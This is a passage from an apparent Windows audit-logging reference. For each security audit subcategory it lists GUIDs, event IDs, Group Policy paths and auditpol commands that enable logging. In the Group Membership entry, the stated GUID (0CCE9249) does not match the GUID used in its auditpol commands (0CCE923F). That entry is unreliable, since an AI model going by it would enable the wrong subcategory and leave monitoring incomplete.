`4769`\n  - `4770`\n  - `4773`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Kerberos Service Ticket Operations\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-service-ticket-operations)\n\n#### Other Account Logon Events\n\n- Subcategory GUID: `{0CCE9241-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - TBD\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Logon\n                        - Audit Other Account Logon Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-logon-events)\n\n### Account Management\n\n#### Application Group Management\n\n- Subcategory GUID: `{0CCE9239-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4783`\n  - `4784`\n  - `4785`\n  - `4786`\n  - `4787`\n  - `4788`\n  - `4789`\n  - `4790`\n  - `4791`\n  - `4792`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Application Group Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-group-management)\n\n#### Computer Account Management\n\n- Subcategory GUID: `{0CCE9236-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low on domain controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4741`\n  - `4742`\n  - `4743`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Computer Account Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-computer-account-management)\n\n#### Distribution Group Management\n\n- Subcategory GUID: `{0CCE9238-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low on Domain Controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4749`\n  - `4750`\n  - `4751`\n  - `4752`\n  - `4753`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Distribution Group Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-distribution-group-management)\n\n#### Other Account Management Events\n\n- Subcategory GUID: `{0CCE923A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Typically Low on all types of computers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4782`\n  - `4793`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Other Account Management Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-management-events)\n\n#### Security Group Management\n\n- Subcategory GUID: `{0CCE9237-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4728`\n  - `4731`\n  - `4732`\n  - `4733`\n  - `4734`\n  - `4735`\n  - `4764`\n  - `4799`\n  - `4727`\n  - `4737`\n  - `4728`\n  - `4729`\n  - `4730`\n  - `4754`\n  - `4755`\n  - `4756`\n  - `4757`\n  - `4758`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit Security Group Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-group-management)\n\n#### User Account Management\n\n- Subcategory GUID: `{0CCE9235-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4720`\n  - `4722`\n  - `4723`\n  - `4724`\n  - `4725`\n  - `4726`\n  - `4738`\n  - `4740`\n  - `4765`\n  - `4766`\n  - `4767`\n  - `4780`\n  - `4781`\n  - `4794`\n  - `4798`\n  - `5376`\n  - `5377`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Account Management\n                        - Audit User Account Management\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-account-management)\n\n### Detailed Tracking\n\n#### DPAPI Activity\n\n- Subcategory GUID: `{0CCE922D-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4692`\n  - `4693`\n  - `4694`\n  - `4695`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit DPAPI Activity\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-dpapi-activity)\n\n#### PNP Activity\n\n- Subcategory GUID: `{0CCE9248-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Varies, depending on how the computer is used. Typically Low.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `6416`\n  - `6419`\n  - `6420`\n  - `6421`\n  - `6422`\n  - `6423`\n  - `6424`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit PNP Activity\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-pnp-activity)\n\n#### Process Creation\n\n- Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4688`\n  - `4696`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Process Creation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation)\n\n#### Process Termination\n\n- Subcategory GUID: `{0CCE922C-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low to Medium, depending on system usage.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4689`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Process Termination\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-termination)\n\n#### RPC Events\n\n- Subcategory GUID: `{0CCE922E-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `5712`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit RPC Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-rpc-events)\n\n#### Token Right Adjusted\n\n- Subcategory GUID: `{0CCE924A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4703`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Token Right Adjusted\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-token-right-adjusted)\n\n### DS Access\n\n#### Detailed Directory Service Replication\n\n- Subcategory GUID: `{0CCE923E-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `These events can create a very high volume of event data on domain controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4928`\n  - `4929`\n  - `4930`\n  - `4931`\n  - `4934`\n  - `4935`\n  - `4936`\n  - `4937`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Detailed Directory Service Replication\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-directory-service-replication)\n\n#### Directory Service Access\n\n- Subcategory GUID: `{0CCE923B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on servers running AD DS role services.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4661`\n  - `4662`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Directory Service Access\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-access)\n\n#### Directory Service Changes\n\n- Subcategory GUID: `{0CCE923C-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on Domain Controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `5136`\n  - `5137`\n  - `5138`\n  - `5139`\n  - `5141`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Directory Service Changes\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-changes)\n\n#### Directory Service Replication\n\n- Subcategory GUID: `{0CCE923D-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium on Domain Controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - `4932`\n  - `4933`\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - DS Access\n                        - Audit Directory Service Replication\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-replication)\n\n### Logon/Logoff\n\n#### Account Lockout\n\n- Subcategory GUID: `{0CCE9217-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4625\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Account Lockout\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-account-lockout)\n\n#### User/Device Claims\n\n- Subcategory GUID: `{0CCE9247-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on a domain controller or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4626\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit User/Device Claims\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-device-claims)\n\n#### Group Membership\n\n- Subcategory GUID: `{0CCE9249-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on a domain controller or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4627\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Group Membership\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-group-membership)\n\n#### IPsec Extended Mode\n\n- Subcategory GUID: `{0CCE921A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4978\n  - 4979\n  - 4980\n  - 4981\n  - 4982\n  - 4983\n  - 4984\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit IPsec Extended Mode\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-extended-mode)\n\n#### IPsec Main Mode\n\n- Subcategory GUID: `{0CCE9218-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4646\n  - 4650\n  - 4651\n  - 4652\n  - 4653\n  - 4655\n  - 4976\n  - 5049\n  - 5453\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit IPsec Main Mode\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-main-mode)\n\n#### IPsec Quick Mode\n\n- Subcategory GUID: `{0CCE9219-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4977\n  - 5451\n  - 5452\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit IPsec Quick Mode\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-quick-mode)\n\n#### Logoff\n\n- Subcategory GUID: `{0CCE9216-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4634\n  - 4647\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Logoff\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn 